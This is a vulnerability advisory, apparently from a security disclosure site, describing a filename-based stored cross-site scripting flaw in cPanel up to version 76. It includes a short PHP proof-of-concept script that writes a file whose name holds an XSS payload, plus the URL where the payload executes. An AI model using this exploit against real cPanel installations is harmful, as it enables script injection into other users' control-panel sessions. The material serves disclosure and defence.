cPanel Filename Based Stored XSS <= v76

2018.08.14
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

[+] Title: cPanel Filename Based Stored XSS <= v76 [+] Author: Numan OZDEMIR [+] Vendor Homepage: cpanel.com [+] Version: Up to v76. [+] Discovered by Numan OZDEMIR in InfinitumIT Labs [+] root@numanozdemir.com - info@infinitumit.com.tr [~] Description: Attacker can run JavaScript codes on this page: http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html [~] How to Reproduce: Create a file as named with your payload in /home/user/logs directory or run this php exploit: <center> <?php $p = $_POST['payload']; $x = get_current_user(); $dir = "/home/".$x."/logs/"; if($_POST){ if(touch($dir.$p)){ die(' Successfully exploited. Visit <br> http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html '); }else{ die('An error occured.'); } }else{ echo 'Enter your payload: <form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>"> <input type="submit" value=">>"></form>'; } // end of the script. ?> Note: You cant create a file as named with / (slash) character by this exploit. This vulnerability is disclosed by cPanel Team's confirmation. // for secure days...


Vote for this issue:
83%
17%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top